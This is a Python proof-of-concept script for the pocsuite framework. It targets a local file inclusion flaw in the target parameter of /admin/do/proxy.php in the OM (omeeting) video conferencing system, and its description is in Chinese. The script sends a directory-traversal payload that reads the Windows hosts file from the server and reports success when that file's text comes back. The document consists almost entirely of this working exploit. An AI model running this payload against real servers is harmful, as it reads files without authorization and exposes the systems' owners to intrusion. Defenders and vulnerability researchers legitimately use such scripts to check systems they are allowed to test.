Charm lesson OM video conferencing system /admin/do/proxy.php file target parameter local file include vulnerability

                                                #!/usr/bin/env python
# coding: utf-8

from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase

class TestPOC(POCBase):
    vulID = 'SSV-12345'  # vul ID
    version = '1'
    author = 'hhxx'
    vulDate = '2016-05-18'
    createDate = '2016-06-14'
    updateDate = '2016-06-14'
    references = ['http://www.wooyun.org/bugs/wooyun-2010-0175273']
    name = '魅课OM视频会议系统 /admin/do/proxy.php 文件 target 参数本地文件包含漏洞'
    appPowerLink = 'http://www.omeeting.com/'
    appName = 'omeeting'
    appVersion = 'N/A'
    vulType = 'Local File Inclusion'
    desc = u'''
        魅课OM视频会议系统是一套基于浏览器的视频面试服务软件，B/S架构，软件安装后即时生成专业视频面试网站，参加面试者无需安装任何软件（包括插件）。招聘双方只要有麦克风和摄像头即可进行视频和声音交流，极易普及，拥有其他解决方案无法比拟的优势。
        /admin/do/proxy.php 文件 target 参数存在本地文件包含漏洞
    '''
    samples = [ 

             ]

    def _verify(self):
        result = {}
        payload = (
                    "/admin/do/proxy.php?method=get&target=http://**.**.**.**:80/push/35004/div_push_0/index.html&method=get&target=../../../../../../../../../../Windows/System32/drivers/etc/host"
                  ) 
        verify_url = '%s%s' % (self.url,payload)
        response = req.get(verify_url,timeout = 10)
        if "Copyright" and "Microsoft Corp" and "This is a sample HOSTS file used by Microsoft TCP/IP for Windows" in response.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = verify_url
        return self.parse_output(result)

    def _attack(self): 
        return self._verify()

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)